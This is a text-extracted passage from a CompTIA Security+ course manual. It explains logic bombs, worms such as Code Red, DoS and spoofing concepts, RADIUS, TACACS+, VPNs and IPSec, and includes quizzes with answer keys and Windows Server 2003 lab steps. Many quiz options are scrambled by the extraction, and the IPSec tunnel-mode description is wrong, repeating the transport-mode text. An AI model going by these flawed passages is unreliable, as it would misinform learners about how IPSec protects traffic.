Explanation Another category of malicious code is known as a logic bomb. A logic bomb is a set of computer instructions that lie dormant until triggered by a specific event. That event can be almost anything, such as opening a document, launching a program, pressing a key a certain number of times, or an action that the computer has taken. Once the logic bomb is triggered, it performs a malicious task. Logic bombs might reside within stand-alone programs as Trojan horses or they might be part of a computer virus. This makes them almost impossible to detect until after they are triggered and the damage is done. Logic bombs are often the work of former employees. One logic bomb caused a companys computerized accounting system to be corrupted. It was triggered by an instruction to check the corporate salary database every three months; if the programmers name was not found, the logic bomb was instructed to launch. Another logic bomb was the work of an independent computer consultant hired to write a program. His intention was to return after the logic bomb was triggered and be paid a large consulting fee to fix the problem. On personal computers, a prominent type of logic bomb is known as a macro virus. A macro virus uses the auto-execution feature of the specific application programs, such as Microsoft Word. Whenever Word is launched, the virus is triggered and performs a malicious act.
Worms
Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious activity on the Internet. The release of the Code Red worm in the summer of 2001, which was shortly followed by Code Red II and Nimda, brought about a sea of change in the type of attacks that security administrators need to fend off. Although the term worm has a few different commonly used meanings, the classic worm or real worm is defined as a self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicates itself to that system. Unlike viruses, true worms do not infect other executable programs, but instead install themselves on the victim computer system as a stand-alone entity that does not require the execution of an infected application. Melissa The term e-mail worm has also been informally used to mean a virus that spreads through external network connections, emphasizing the threat posed by mass mailing viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail worm and most famous virus to date. Melissa gained notoriety in March of 1999 as the first virus to send mass e-mails of itself by using recipients in a users address book. Code Red Although e-mail worms have become a common and very prevalent threat to networks, true worms such as Code Red have become even more common, accounting for 80% of all malicious activity on the Internet and bringing e-commerce networks to a standstill. Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS 4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then scanned for the IIS vulnerability. If the worm found a target system with the vulnerability, it executed the buffer overflow exploit, which resulted in the worms code being loaded onto and executed by the victim system.
349
The worm then began to propagate itself from the newly compromised machine. After two hours, the worm changed the servers Web page. The Code Red worm also tried to perform a denial-of-service attack on the IP address of www.whitehouse.gov, but the threat was averted by simply changing the domains IP address. Since Code Red did not store itself on any files, the worm could be removed from infected systems simply by rebooting the machine; however, servers would remain vulnerable to the attack and could be reinfected with Code Red until system administrators applied the necessary security patch provided by Microsoft. Although Code Red was programmed to go dormant shortly after its release, its successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS servers over a year after their release. Countermeasures The method of true worms is to exploit known vulnerabilities in order to spread themselves; the key defense against these attacks is for system administrators to ensure all servers are patched with the latest security updates. Since Nimda can exploit a vulnerability in Internet Explorer to run an executable in a Web page or e-mail message without user intervention, system administrators must keep abreast of security issues affecting their users desktop computers and ensure the required security patches are installed. Network and host based intrusion detection systems (IDS) are also critical components needed to secure a network against remote attacks such as Code Red. Host-based IDS can detect unauthorized system activity and stop it before the server is infected. Network-based IDS can detect the signatures of known worms as well as the malicious activity generated by those worms and can notify system administrators as well as instruct routers and firewalls to block traffic from the offending hosts. To protect against worm attacks that are propagated via e-mail, a comprehensive antivirus system should be implemented. Make sure users have their e-mail set so it does not preview a message when selected. Instead, users should have to double-click the message and only then if they recognize the sender.
350
Do it!
H-3:
Understanding software exploitation

1 What is a buffer overflow?
A buffer overflow is an attack where the software fills the allocated memory and starts overwriting areas of memory reserved for other processes. It results in application crashes, operating system crashes, or a situation where the attacker can cause his own code to be executed on the system.
2 What is the difference between a virus and a worm?

A virus is a self-replicating program that spreads by infecting other programs. A worm is a self-contained program that uses security flaws to compromise the victim and replicate itself to that system.
3 The Windows Server 2003 at command is a backdoor. True or false?

True: If used to install malicious code on a target system.
351
Unit summary: Attacks and malicious code

Topic A In this topic, you learned that Denial-of-service (DoS) attacks are a family of attack methods that interrupt network services for legitimate users. You learned that an SYN flood prevents users from accessing a target server by flooding it with half-open TCP connections, and that the Smurf attack overwhelms a host with ICMP packets. You also learned about the Ping of Death, which uses IP packet fragmentation techniques to crash remote systems, as well as Distributed Denial of Service attacks, which manipulate multiple hosts to carry out a DoS attack on a target. In this topic, you learned that man-in-the-middle attacks refer to a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session. The key to this concept is that both hosts think they are communicating with the other when they are in fact communicating with the attacker. In this topic, you learned that spoofing is pretending to be someone else by imitating or impersonating that person in order to gain access to a network. There are four primary types of spoofing that are issues for the information security professional: IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing. In this topic, you learned about replay attacks, where attackers listen to and repeat messages from a legitimate user in order to impersonate the user and gain access to systems. In this topic, you learned about TCP session hijacking, where an attacker tries to make the victim believe that he or she connected to a trusted host, when in fact the victim is communicating with the attacker. In this topic, you learned about social engineering attacks and why they can be so effective in obtaining a password or other valuable information from unsuspecting victims. In this topic, you learned that malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. In this topic, you learned about software exploitation. You learned that the primary difference between the various types of malware is their means of spreading.
Topic B
Topic C
Topic D
Topic E
Topic F
Topic G
Topic H
Review questions
1 Distributed denial-of-service attacks can involve which of the following? (Choose all that apply.)
A
Zombies
B Birthday attack
C
Handlers
D TFN2K
352
CompTIA Security+ Certification 2 Which of the following correctly outlines the normal setup of a TCP session? A ACK, SYN, SYN/ACK B SYN, ACK, RST
C
SYN, SYN/ACK, ACK
D ACK, RST, SYN/ACK 3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:
Item CodeRedII Trin00 BO2K Stacheldracht Melissa Type Virus Tool Backdoor Tool Virus
4 ARP poisoning affects which of the following? (Choose all that apply.) A Hostname-to-IP address resolutions
B
IP address-to-MAC address resolutions
C Domain name resolution D Authentication requests 5 Man-in-the-middle attacks can be accomplished using which of the following?
A
ICMP redirects
B NetBus C ARP spoofing D Replay attacks 6 Denial-of-service (DoS) attacks is a family of attack methods that make target systems unavailable to their legitimate users. True or false?
True
7 The SYN flood attack exploits the nature of the TCP three-way ______________.
Handshake
8 What are IP fragmentation attacks and how do they work?

These attacks misuse ICMP. These attacks craft a very large IP packet and send it to the victim fragment by fragment. Once the collected fragments exceed the 65,535 byte size limit, the victims host crashes.
9 Pings are used to establish whether a remote host is reachable. True or false?
True
353
10 A well-known exploit that uses IP Packet fragmentation techniques to crash remote systems is called: A Spoofing B Smurf
C
Ping of Death
D ARP poisoning 11 Smurf is a non-OS specific attack that uses the network to amplify its effect on the victim. True or false?
True
12 The best defense against a replay attack is:

An anti-replay feature that makes each packet unique.
13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all internal routers. True or false?
True
14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or false?
True
15 What are three strategies for cryptanalysis?

Cyphertext-only, known plaintext attack, chosen plaintext attack
16 The _____________ attack is used to find collisions of hash functions.

Birthday
17 A _________________ __________________ is a program that poses as something else, causing the user to willingly inflict the attack on himself or herself.
Trojan horse
354
41
Unit 4 Remote access

A Explain the different communications
mediums for remote access and issues surrounding them.

B Describe the IEEE 802.1X, RADIUS, and
TACACS+ authentication systems.

C Describe VPN technology and its tunneling
protocols.
D Identify the different vulnerabilities
associated with telecommuting.
42
Topic A: Securing remote communications

Explanation Networks have become ubiquitous in todays interconnected world. Access to these networks from remote locations has also boomed. As the trend towards telecommuting grows, so has the risk associated with increased exposure. Open-air networks, equipped with mobile phones, PDAs, and wireless NICs, are vulnerable to snooping and denial of service attacks. Personal firewalls and antivirus scanners provide limited protection as telecommuters access e-mail and Internet messaging services over open cable and public telephone lines. Hackers tools and how-to manuals abound on the Internet, within easy reach of script kiddies. The task of the security specialist is to identify all communications mediums whereby remote users can communicate with their home office, identify their potential vulnerabilities, and then take precautionary measures to safeguard the confidentiality, integrity, and accessibility of data.
Communications mediums
The communication medium describes the physical connection between the remote computer and your network. These include: Dial-up connections Integrated Services Digital Networks (ISDN) Digital Subscriber Lines (DSL) Cable modems Dial-up connections Public Switched Telephone Network (PSTN) connections (also called dial-up connections) use analog modems and standard telephone lines to transmit data. They rely on Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) to dial up and connect to a remote access server. (PPP is a data link protocol that provides dialup access over serial lines. It provides password protection and authentication using the PAP or the stronger CHAP protocols. SLIP is an older data link protocol and has been largely replaced by PPP.) PSTN connections are the cheapest means of data communications, although lack of a local ISP can run up some expensive long-distance bills. Speeds range up to 56 Kbps. From a security standpoint, telephone lines are difficult to sniff, but are susceptible to war dialing. This is an attack where the perpetrator dials all telephone numbers within a specific neighborhood, records those that have modem connections then redials into the system in an attempt to break into the computer. ISDN Integrated Services Digital Network (ISDN) is a telecommunications standard for transmitting voice, video, and data over digital lines. Like PSTN, it relies on SLIP and PPP to communicate. ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B channels, or bearer channels, which can be combined to create higher bandwidth, to carry voice and data. It provides a separate 16 Kbps D channel, or delta, channel for control signals.
Remote access
43
The D channel is used to signal the telephone company computer to make calls, put them on hold, and activate features such as conference calling and call forwarding. It also receives information about incoming calls, such as the identity of the caller. ISDN also offers two high-end services: Primary Rate Interface (PRI) is geared for business customers. The North American and Japanese implementation provides 23 64-Kbps B channels and one 64 Kbps D channel for control signals. The European implementation provides 30 B channels and one D channel. Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell switching with rates above 155 Mbps to transport data, voice, and video on a single circuit. ISDN is noticeably faster than analog modems but significantly slower than DSL connections. Unlike DSL, it can be installed in almost any location. DSL Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper telephone lines for high-speed Internet access. DSL technology is available in several forms, collectively referred to as xDSL. Transmission speeds range between 384 Kbps for Internet uploads and 1.54 Mbps for downloads. DSL must be installed within a 5.5 km (18,000 ft.) radius of the phone companys access point. The faster the connection, the closer the subscriber must be to the access point. DSL is more expensive than analog connectivity options. One security issue concerning DSL is that the network connection is always on until the system is switched off or unplugged from the network. This leaves the system vulnerable to hackers. Cable modem A cable modem is an external device that allows your computer to connect to the Internet through a cable TV wire. The cable runs from your neighborhood to a central location, referred to as the headend. Additional equipment is installed there that communicates to all the cable modems in subscribers homes. Cable modems translate radio frequency (RF) signals to and from the cable plant into Internet Protocol (IP). For those who can get it in their area, cable modem service has quickly become a popular high-speed alternative due to competitive costs and very high speeds; however, there are some drawbacks. Since this is a shared server, bandwidth diminishes as more local users simultaneously access the Internet. In addition, as the connection to the Internet is always open, the system is vulnerable to attacks by hackers.
Protecting the network

The solution to securing remote access to a network is twofold: Authenticate users Authentication mechanisms include IEEE 802.1X, Remote Authentication Dial-In User Service (RADIUS), and Terminal Access Controller Access Control System (TACACS+). Encrypt data flows Encryption mechanisms include Point-to-Point Tunneling Protocol (PPTP), Layer Two Tunneling Protocol (T2TP), IP Security protocol (IPSec), and Secure Shell (SSH).
44
Do it!
A-1:
Reviewing communications mediums

1 Dial-up connections use _________ and _______ protocols to dial up and connect to a remote access server.
SLIP, PPP
2 What are some of the vulnerabilities of phone lines?

They are susceptible to war dialing.
3 What are some of the drawbacks to using cable modems?

Bandwidth diminishes as more local users simultaneously access the Internet. As the connection to the Internet is always open, the system is vulnerable to attacks by hackers.
4 Which ISDN channel is used to carry voice and data? A

B
Channel A Channel B Delta channel BRI channel
C D
5 PPP uses _______ and ________ protocols to authenticate users.

A
PAP and CHAP PSTN and SLIP SLIP and PAP DSL and ISDN
B C D
Remote access
45
Topic B: Authentication
This topic covers the following CompTIA Security+exam objective:
# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies 802.1x TACACS (Terminal Access Controller Access Control System) Radius
Security protocols
Explanation When a corporation adds remote users to their corporate network, it faces a new range of security issues: the users are communicating over an open line, or using remote access applications over the Internet. This enables an unauthorized user to snoop or launch replay and man-in-the-middle attacks against the network. Authenticating remote users requires additional security measures to ensure data is protected over an unsecured communication medium. First, usernames and passwords must be encrypted. Second, corporate policies, including access control lists, must be maintained. Finally, all communications must be monitored and logged for auditing purposes. The following security protocols provide solutions to these issues: IEEE 802.1X Remote Authentication Dial-In User Service (RADIUS) Terminal Access Controller Access Control System (TACACS+)
IEEE 802.1X
Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for communication between two computers using a serial interface, typically a personal computer connected by phone line to a server. Once the connection is established, PPP can negotiate an authentication protocol to authenticate the user. The traditional authentication method has been either PAP or CHAP, although PAP is not considered secure. Extensible Authentication Protocol (EAP) extended the capabilities of PPP to encompass a range of new authentication methods, including token cards, one-time passwords, certificates, and biometrics. It describes standards to ensure compatibility and interoperability between the remote user, an access point or switch, and an authentication server, such as RADIUS. EAP deals exclusively with the authentication process. IEEE 802.1X provides a standard for authenticating and controlling user traffic to a protected network. It does not provide the actual authentication mechanism, but instead uses the EAP protocol to define how authentication takes place.
46
CompTIA Security+ Certification There are several forms of EAP offering different levels of security and support for wired and wireless LANs: EAP over IP (EAPoIP) EAP over LAN (EAPOL) Message Digest Algorithm/Challenge-Handshake Authentication Protocol (EAP-MD5-CHAP) Transport Layer Security (EAP-TLS) Tunneled Transport Layer Security (EAP-TTLS) RADIUS Light Extensible Authentication Protocol 9 (LEAP) Cisco IEEE 802.1X conversation Depending on the version of EAP running, the authentication exchange will vary. The following exchange describes a wireless LAN using 802.1X: 1 A client (known as the supplicant) tries to connect to a wireless access point (known as the authenticator). 2 The access point (authenticator) detects the client and enables the clients port. It forces the port into an unauthorized state, so only 802.1X traffic is forwarded. All other traffic, such as HTTP, DHCP, and POP3 packets are blocked. 3 The supplicant sends an EAP-start message. 4 The authenticator sends an EAP-request identity message requesting the users identity. 5 The supplicant sends the identity to the authenticator. 6 The authenticator forwards the identity to the authentication server. The authentication server might use RADIUS, although 802.1X does not specify it. 7 The authentication server authenticates the user. The result is either an accept or a reject packet. 8 The authentication server returns the result to the authenticator. 9 Upon receiving the accept packet, the authenticator opens the clients port for other types of traffic. 10 At logoff, the client sends an EAP-logoff message. This forces the access point to transition the client port to an unauthorized state. Exhibit 4-1 uses a RADIUS server as an example.
Remote access
47
Exhibit 4-1: IEEE 802.1X conversation For information on the latest developments on IEEE standards, visit the following Web site:
http://www.ieee.org
48
Do it!
B-1:
Discussing IEEE 802.1X

1 The point of authentication for remote access to a central LAN is usually some type of network access server. True or false?
True
2 PPP establishes a link between remote systems. True or false?

True
3 EAP is the acronym for _____________________. A B

C
Extended Authorization Protocol Extended Authentication Protocol Extensible Authentication Protocol Extensible Administrative Protocol
4 EAP supports multiple authentication methods including:

A B C
One-time passwords Certificates Token cards Shared keys
5 What are the three components in the 802.1X authentication exchange?

A
Supplicant, authenticator, authenticating server RADIUS client, authenticator, authenticating server Supplicant, RADIUS server, authenticating server Supplicant, ISP, authenticator
B C D
Remote access
49
Remote Authentication Dial-In User Service

Explanation Remote Authentication Dial-in User Service (RADIUS) provides a centralized system for authentication, authorization, and accounting. It is widely deployed in remote access networks to authenticate users. RADIUS has two components: a RADIUS client, which is typically a network access server such as a dial-up server, VPN server, or wireless access point, and a RADIUS server. The RADIUS client is located at a remote site; the server is located on the corporate LAN. All user authentication and network service access information is located on the RADIUS server. This information is contained in a variety of formats suitable to the users requirements. RADIUS in its generic form can authenticate users against a UNIX password file, Network Information Service (NIS), as well as a separately maintained RADIUS database. Authentication with a RADIUS server The RADIUS client sends authentication requests to the RADIUS server and acts on responses sent back by the server. RADIUS authenticates users through a series of communications between the client and the server using the User Datagram Protocol (UDP). After a user is authenticated, the client provides that user with access to the appropriate network services. 1 Using any of the remote access methods, the user connects to the RADIUS client, which is also a network access server (NAS). After the connection is established, the RADIUS client prompts the user for a name and password. 2 From this information, the RADIUS client creates a data packet called the access request. This packet includes information identifying the specific RADIUS client sending the access request, the port that is being used for the connection, and the username and password. 3 For protection from eavesdropping hackers, the RADIUS client encrypts the password using a shared secret. 4 The access request is sent over the network to the RADIUS server. 5 When the access request is received, the RADIUS server validates the request and then decrypts the data packet using its shared secret to access the username and password information. This information is passed on to the appropriate security system being supported. This could be a UNIX password file, Kerberos, or even a custom-developed security system. 6 If the username and password are correct, the server sends an access accept message that includes information on the users network system and service requirements. For example, the RADIUS server tells the RADIUS client that a user needs TCP/IP, PPP, or SLIP to connect to the network. The acknowledgment can even contain filtering information to limit a users access to specific resources on the network. 7 If, at any point in this logon process, conditions are not met, the RADIUS server sends an access reject to the RADIUS client, and the user is denied access to the network. To ensure that requests from unauthorized users are not answered, the RADIUS server sends an authentication key, or signature, identifying itself to the RADIUS client.
410
CompTIA Security+ Certification 8 After this information is received by the NAS, it enables the necessary configuration to deliver the right network services to the user. This process is shown in Exhibit 4-2.
Exhibit 4-2: RADIUS Benefits The distributed approach to network security provides a number of benefits: Greater security The RADIUS client/server architecture allows all security information to be located in a single, central database, instead of scattered around a network in several different devices. A single UNIX system running RADIUS is much easier to secure and manage than several communications servers located throughout a network. Scalable architecture RADIUS creates a single, centrally located database of users and available services, a feature particularly important for networks that include large modem banks and more than one remote communications server. The RADIUS server manages the authentication of the user and the access to services from one location. Any device that supports RADIUS can be a RADIUS client, so a remote user can gain access to the same services from any communications server communicating with the RADIUS server. Open protocols RADIUS is fully open, is distributed in source code format, and can be adapted to work with systems and protocols already in use. This feature potentially saves tremendous amounts of time by allowing organizations to modify the RADIUS server to fit their network rather than rework their network to incorporate the NAS. RADIUS can be modified for use with most security systems on the market and works with any communications device that supports the RADIUS client protocol. The RADIUS server has modifiable stubs which enable customers to customize it to run with most security technologies.
Remote access
411
Future enhancements As new security technology becomes available, the customer can take advantage of that security without waiting for added support to the NAS. The new technology need only be added to the RADIUS server by the customer or an outside resource. RADIUS also uses an extensible architecture, which means that as the type and complexity of service the NAS is required to deliver increases, RADIUS can be expanded to provide those services. Do it!
B-2:
Authenticating with a RADIUS server

1 The RADIUS client/server architecture allows all security information to be located in a single, central database. True or false?
True
2 RADIUS supports most communication and security technologies. True or false?

True
3 RADIUS is not expandable. True or false?

False: It is expandable.
4 Which of the following cannot be used as a RADIUS client? A B C

D
VPN server Wireless access point Network access server Windows workstation
5 Which services are provided by RADIUS? (Choose all that apply.)

A B C
Authentication Auditing Authorization Tunneling
412
Terminal Access Controller Access Control System

Explanation The Terminal Access Controller Access Control System (TACACS+) is an authentication protocol developed by Cisco Systems to address the need for a scalable authentication solution. It is the third generation of TACACS protocols: the original protocol, TACACS, did not provide accounting functions. This was replaced by XTACACS, which separated the functions of authentication, authorization, and accounting. TACACS+ is a proprietary version and an entirely new protocol. TACACS+ conversation When a user attempts to remotely access a central LAN, the user sends an authorization request to the TACACS+ server. The server then sends a reply asking for the username. The user inputs a username, and this is sent to the TACACS+ server, which then requests a password. The user inputs a password, which is verified against a database by the TACACS+ server. If successful, the authentication portion of the logon process is complete. At this point, the users computer negotiates with the TACACS+ server what the authorization settings are. While this happens, the TACACS+ server records the activities being performed by the remote user into a database for future security audits if necessary. The process for client-side tunneling is shown in Exhibit 4-3.
Exhibit 4-3: TACACS+
Remote access Comparing TACACS+ and RADIUS
413
TACACS+ uses TCP for its transport (unlike RADIUS, which uses UDP). TCP offers several advantages over UDP, primarily a connection-oriented transmission. RADIUS uses UDP, so it requires additional functions such as retransmit attempts and time-outs to compensate for the connectionless transmission. Using TCP offers a separate acknowledgement that a request has been received within the network, regardless of how loaded or slow the authentication mechanism might be. It also provides immediate indication of a crashed server because acknowledgements would not be forthcoming. While RADIUS only encrypts the password in the packet that is passed from client to server, TACACS+ encrypts the entire body of the packet including username, authorized services, and other information. RADIUS combines the authentication and authorization packets, it is difficult to separate these functions. TACACS+ separates authentication, authorization, and accounting, which allows for separate authentication solutions: a user can logon using a Kerberos server for authentication and a TACACS+ server for authorization and accounting.
If students are not familiar with the protocols, you can briefly describe them.
Another advantage to using TACACS+ is that it offers multiple protocol support while RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections cannot be supported by RADIUS. TACACS+ is able to support all of these protocols.
414
Do it!
B-3:
Enabling dial-in access Heres why

You are logged in as Administrator. Windows Server 2003 does not allow dial-in access by default. In order to allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis.
Heres how
1 Click Start 2 Right-click My Computer
Choose Manage 3 Expand Local Users and Groups Select Users 4 Double-click Administrator 5 Activate the Dial-in tab Select Allow access
Under Remote Access Permission (Dial-in or VPN), as shown here.
Click OK 6 Double-click User1 and repeat step 5 7 Double-click User2 and repeat step 5 8 Close the Computer Management window
Remote access Do it!
415
B-4:
Discussing authentication protocols

1 TACACS+ cannot support AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections. True or false?
False: TACACS+ can support all these protocols.
2 Which of the following authentication protocols is geared toward wireless networks? A

B
TACACS+ 802.1X PPP RADIUS
C D
3 Which authentication protocol uses TCP for transport?

TACACS+
416
Topic C: Virtual private networks

# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies VPN (Virtual Private Network) L2TP / PPTP (Layer Two Tunneling Protocol / Point to Point Tunneling Protocol) SSH (Secure Shell) IPSEC (Internet Protocol Security)
Types of VPNs
Explanation A virtual private network (VPN) is a tool that enables the secure transmission of data over unsecured networks, such as the Internet. Remote sites and users are able to access their network information as if using a private network (hence the name virtual private network) without the costs associated with long-distance calls or leased lines. A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling enables a foreign protocol to travel across a network by encapsulating (wrapping) it inside the packets of the host network. The security protocols supply an additional level of security by encrypting the data before transmission. There are two types of VPN commonly used in corporate networks: Site-to-site VPN Remote access VPN
Site-to-site VPN
Site-to-site VPNs allow a corporation to connect to branch offices or other companies over a public network. Each site requires a VPN gateway (dedicated hardware or a router running VPN server software) to connect to the Internet. The gateway-to-gateway architecture logically operates as a WAN, connecting offices through multiple private tunnels across the Internet. All locations must use identical encryption and encapsulation protocols and settingsPPTP, L2TP and IPSec are the most common. Each local area network connects to the Internet with a router. In order to receive incoming calls, the corporate hub router employs dedicated lines to permanently connect to a local ISP for incoming calls; branch offices might use either dedicated lines or dial-up. In both cases, the routers establish a secure tunnel across the Internet.
The protocols listed here are discussed later in this Unit.
Remote access
417
Remote access VPN

Companies that have many telecommuting employees will use remote access VPNs, also called virtual private dial-up networks (VPDNs), to communicate long-distance. The only cost involved is that of a local phone call to a local provider. The immediate savings over the use of long-distance and toll-free calls can quickly recoup the startup cost of implementing a VPN. Equipment Remote access VPNs can use a wide variety of communication modes, including analog lines, ISDN lines, digital subscriber lines (DSL) and cable modems. The corporate network has a VPN access point or server that is permanently connected to the Internet and configured to accept incoming calls. The client is equipped with VPN client software and has Internet access through an ISP. Both client and server must be running the same encryption and encapsulation protocols. There are many versions of VPN client software available to establish this type of connectivity. Perhaps the most prominent and widely used is Microsoft L2TP/IPSec VPN Client, which is included in Microsoft Windows XP, NT 4.0, 2000 and Server 2003. This feature has the capability of configuring modems and other remote access devices as VPN adapters. For Microsoft Windows 2000 and Windows Server 2003 servers, the VPN Server software is already built into the product. Operation To establish a remote access VPN, the client uses a local Internet service provider (ISP) to connect to the Internet. The client then starts the VPN client software, which creates a virtual connection to the access point or corporate network. This allows the Internet service provider to act merely as a transporter of a data stream that has been encrypted prior to the initial transmission, as shown in Exhibit 4-4.
Exhibit 4-4: Client-side tunneling An alternative to installing or configuring the client computer to initiate the necessary security communications is to outsource the VPN to a service provider. With this type of configuration, there is no need for the company to maintain client-side software or configurations. When implementing this type of solution, however, encryption does not happen until the data reaches the providers network.
418
CompTIA Security+ Certification This results in an unsecured connection from the users computer to the providers network access server, as shown in Exhibit 4-5. This also places the responsibility of protecting corporate access to information with an external entity.
Exhibit 4-5: Service provider tunneling In this scenario, remote users dial in to a service providers network or point of presence (POP) via a local or toll-free number. The service provider, in turn, initiates a secure encrypted tunnel to the corporate network. If security is of a high concern, this type of implementation might not be the best choice.
VPN drawbacks
Cost benefits and flexibility aside, using VPNs does have its problems. VPN devices are not completely fault tolerant although there are efforts underway to address this issue. In addition, there are diverse choices when implementing VPNs. Software solutions tend to have trouble processing the multitude of simultaneous connections that occur on a large network. This problem can be mitigated by using a hardware solution, but that requires a much higher cost. Its also important to remember there is no such thing as absolute security. As more security is added to a network, project costs increase, and simplicity suffers according to a law of diminishing returns each incremental increase in security over a certain point becomes more and more expensive. A proper balance in these issues must be determined and maintained. Do it!
C-1:
Configuring a Windows Server 2003 VPN server Heres why
Heres how
This activity takes place only at Server-X.
1 On Server-X, click Start Choose Administrative Tools, Routing and Remote

Access
2 Right-click the server name Choose Configure and

Enable Routing and Remote Access
To configure the server. The Routing and Remote Access Server Setup Wizard will begin.
Click Next
Remote access 3 Select Remote Access (dialup or VPN)
419
Click Next 4 Check VPN Click Next

Assist students with this step, if necessary.
The Remote Access window appears.
5 Select the network interface that connects this server to the Internet Click Next 6 Click Next 7 Click Next
This machine has two NICs installed.
To accept the default of automatically assigning IP addresses to remote clients To accept the default value of No, use Routing and Remote Access to authenticate connection requests. To start the Routing and Remote Access service. If prompted about configuring the DHCP Relay Agent.
8 Click Finish 9 Click OK

Explain to students they will connect to this VPN server from Server-Y in a later activity.
10 Close the Routing and Remote Access window
420
Do it!
C-2:
Understanding VPNs

1 Tunneling is accomplished by _____________ the data packets within the packets of the host network. A
B
authenticating encapsulating decrypting encrypting
C
D
2 Explain the difference between site-to-site and remote access VPNs.

Site-to-Site VPNs connect branch offices to the corporate network over the Internet using VPN gateways, in essence creating a WAN. Remote access VPNs are used to connect mobile users to the corporate network. The remote users must use a VPN client software to connect to the ISP, and then establish a tunnel.
Remote access
421
Tunneling protocols
Explanation Tunneling hides or encapsulates the original packet inside a new packet. The new packet has new addressing and routing information, which enables it to travel across networks. When the new packet arrives at the destination network, the tunneling protocols are stripped away, exposing the original packet. Two commonly used tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two Tunneling Protocol (L2TP). Point-to-Point Tunneling Protocol (PPTP) The Point-to-Point Tunneling Protocol (PPTP) protocol is built upon the wellestablished Internet protocols of PPP (Point-to-Point Protocol) and Transmission Control Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption and compression of data sent over analog telephone lines. TCP/IP provides a transport mechanism for conveying digital data over the Internet infrastructure. When a user phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP connection but then repackaged for transport over the Internet. This process uses tunneling. In the case of data sent over phone lines, the original data packets are encapsulated within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2). PPTP then encrypts and encapsulates the PPP packets within IP datagrams for transmission through the Internet. PPTP does much more than deliver messages. After a PPTP link has been established, it provides its users with a virtual node on the corporate LAN or WAN. PPTP uses Microsoft point-to-point encryption (MPPE) to encrypt the data packets, and an authentication protocol such as PAP or CHAP to verify users identities before granting access to the corporate network. PPTP employs TCP packets to perform status inquiry and signaling over the network. The control packets are transmitted over a separate control channel and perform the following tasks: Query the status of communications servers Provide in-band management Allocate channels and places outgoing calls Notify Windows NT/2000/Server 2003 servers of incoming calls Transmit and receive user data with bi-directional flow control Notify Windows NT/2000/Server 2003 servers of disconnected calls Assure data integrity, while making the most efficient use of network bandwidth by tightly coordinating the packet flow Layer Two Tunneling Protocol (L2TP) Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25, Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. LT2P uses UDP to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec, to encrypt the data frames. Authentication is accomplished using TACACS+ or RADIUS.
422
CompTIA Security+ Certification The following is a comparison of L2TP and PPTP:

Feature Encryption L2TP No native encryption relies on other encryption protocols, such as IPSec. PPTP Native PPP encryption, not compatible with IPSec. Encrypts data, but negotiations sent in plaintext. Authentication RADIUS, TACACS+ Computer-level authentication uses certificate infrastructure, and userlevel uses PPP authentication. Data protocols Control port IP, IPX, SNA, NetBEUI UDP 1701 Standard PPP authentication using PAP, CHAP or MS-CHAP protocols.
IP only TCP 1723
IP Security protocol
IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can travel securely over a public IP network. It uses OSI layer 3, the network layer, to send encrypted communications between two network devices. Its commonly used to secure VPN communications over an open network. IPSec protocols The IPSec protocol suite is made up of four separate protocols: Authentication Header (AH) protocol signs the data packets using MD5 or SHA1 hashes and a shared secret key. This guarantees authenticity. Encapsulating Security Payload (ESP) protocol encrypts the packet using a symmetric encryption algorithm (DES or 3DES) and shared secret key. This ensures confidentiality. IP Payload Compression Protocol (IPComp) compresses the data packet before transmission. When used in combination with ESP encryption, the compression is applied to the packet before encryption. Internet Key Exchange (IKE) provides an automated method for negotiating the shared secret keys. The protocols might be applied alone or in combination. IPSec encryption modes IPSec also offers two modes of encryption: transport and tunnel. Transport mode encrypts the data portion of each packet, but not the header. This mode is used in host-to-host (peer-to-peer) communications.data portion of each packet Tunnel mode encrypts the date portion of each packet, but not the header. Tunneling allows you to hide the source and destination addresses from hackers. This mode is used by VPN gateways. To use IPSec, both the sender and the recipient must be IPSec compliant.
Remote access How it works
423
To communicate using IPSec, the following steps must take place: 1 An administrator creates an IPSec policy. This contains a set of rules that define what types of traffic (for example, HTTP or FTP) require encryption and which encryption and/or authentications protocols to use. Each rule can specify multiple authentication methods. 2 The administrator distributes the IPSec policy to all targeted machines. 3 The two hosts automatically negotiate the authentication and encryption method to be used for communication. Which protocols are selected depends on the IPSec policy. 4 If the selected protocol requires negotiating secret keys, the IKE is employed. One of three methods is implemented: Both parties use a password known as a pre-shared key. The two parties swap a hashed version of the pre-shared key, and then attempt to recreate the hashed data. If successful, both parties can begin secure communications. Both parties exchange public keys that have been certified by a CA. Both parties use Kerberos v5 for authentication. 5 The IP packets are encrypted and/or signed according to the negotiated terms. All functions of IPSec remain transparent to the user.
Secure Shell
